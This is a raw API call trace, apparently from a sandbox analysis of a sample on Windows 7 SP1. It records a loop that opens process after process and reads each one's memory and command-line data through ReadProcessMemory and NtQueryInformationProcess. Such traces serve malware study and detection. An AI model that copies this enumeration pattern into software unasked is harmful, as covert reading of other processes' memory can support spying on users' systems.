[0405.233] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.233] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.234] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x371ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.234] malloc (_Size=0x74) returned 0x2c4740
[0405.234] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x372766, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.234] free (_Block=0x2c4740)
[0405.235] CloseHandle (hObject=0x240) returned 1
[0405.236] _ui64tow (_Value=0x95c, _Buffer="2360", _Radix=10) returned="2396"
[0405.242] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2396") returned 4
[0405.243] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.243] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x240
[0405.267] GetLastError () returned 0x0
[0405.267] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.267] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.267] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.267] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.268] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a26f6, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.269] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.270] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.270] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.270] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.271] malloc (_Size=0x7c) returned 0x2c4740
[0405.271] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a276a, lpBuffer=0x2c4740, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.271] free (_Block=0x2c4740)
[0405.272] CloseHandle (hObject=0x240) returned 1
[0405.273] _ui64tow (_Value=0x970, _Buffer="2396", _Radix=10) returned="2416"
[0405.277] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2416") returned 4
[0405.278] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.278] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x240
[0405.302] GetLastError () returned 0x0
[0405.302] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.302] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1728e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1726e0, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.304] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.305] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.306] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x171ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.306] malloc (_Size=0x62) returned 0x2c0800
[0405.306] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x17273a, lpBuffer=0x2c0800, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.306] free (_Block=0x2c0800)
[0405.307] CloseHandle (hObject=0x240) returned 1
[0405.308] _ui64tow (_Value=0x96c, _Buffer="2416", _Radix=10) returned="2412"
[0405.316] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2412") returned 4
[0405.318] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.318] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x240
[0405.340] GetLastError () returned 0x0
[0405.340] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x422900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4226ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.342] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.343] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.343] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.344] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.344] malloc (_Size=0x68) returned 0x2c08e0
[0405.344] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x42274e, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0405.344] free (_Block=0x2c08e0)
[0405.345] CloseHandle (hObject=0x240) returned 1
[0405.346] _ui64tow (_Value=0x958, _Buffer="2412", _Radix=10) returned="2392"
[0405.352] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2392") returned 4
[0405.353] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.353] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x240
[0405.380] GetLastError () returned 0x0
[0405.380] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.380] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.381] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.381] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.381] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b26e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.382] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.383] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.384] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.384] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.384] malloc (_Size=0x64) returned 0x2c0800
[0405.384] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2740, lpBuffer=0x2c0800, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.384] free (_Block=0x2c0800)
[0405.385] CloseHandle (hObject=0x240) returned 1
[0405.386] _ui64tow (_Value=0xaa8, _Buffer="2392", _Radix=10) returned="2728"
[0405.391] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2728") returned 4
[0405.392] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.392] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa8) returned 0x240
[0405.416] GetLastError () returned 0x0
[0405.416] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.416] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.417] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.417] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x192900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.417] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1926e4, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.418] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.419] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.419] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.420] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x191ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.420] malloc (_Size=0x6a) returned 0x2c4740
[0405.420] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x192746, lpBuffer=0x2c4740, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.420] free (_Block=0x2c4740)
[0405.421] CloseHandle (hObject=0x240) returned 1
[0405.422] _ui64tow (_Value=0xab4, _Buffer="2728", _Radix=10) returned="2740"
[0405.435] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2740") returned 4
[0405.436] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.436] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.463] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab4) returned 0x240
[0405.463] GetLastError () returned 0x0
[0405.463] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.463] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.463] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.464] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5728f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.464] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5726e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.465] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.466] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.466] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.467] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.467] malloc (_Size=0x64) returned 0x2c0800
[0405.467] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x572740, lpBuffer=0x2c0800, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.467] free (_Block=0x2c0800)
[0405.468] CloseHandle (hObject=0x240) returned 1
[0405.469] _ui64tow (_Value=0xabc, _Buffer="2740", _Radix=10) returned="2748"
[0405.474] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2748") returned 4
[0405.476] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.476] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.498] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x240
[0405.499] GetLastError () returned 0x0
[0405.499] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.499] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.499] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.499] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4128c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.500] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4126da, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.501] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.502] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.502] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.502] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x411ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.503] malloc (_Size=0x5a) returned 0x2c0800
[0405.503] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x41272c, lpBuffer=0x2c0800, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.503] free (_Block=0x2c0800)
[0405.504] CloseHandle (hObject=0x240) returned 1
[0405.505] _ui64tow (_Value=0xac4, _Buffer="2748", _Radix=10) returned="2756"
[0405.509] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2756") returned 4
[0405.511] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.511] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.538] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x240
[0405.538] GetLastError () returned 0x0
[0405.538] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.539] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.539] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x422920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.539] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4226f4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.540] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.542] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.542] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
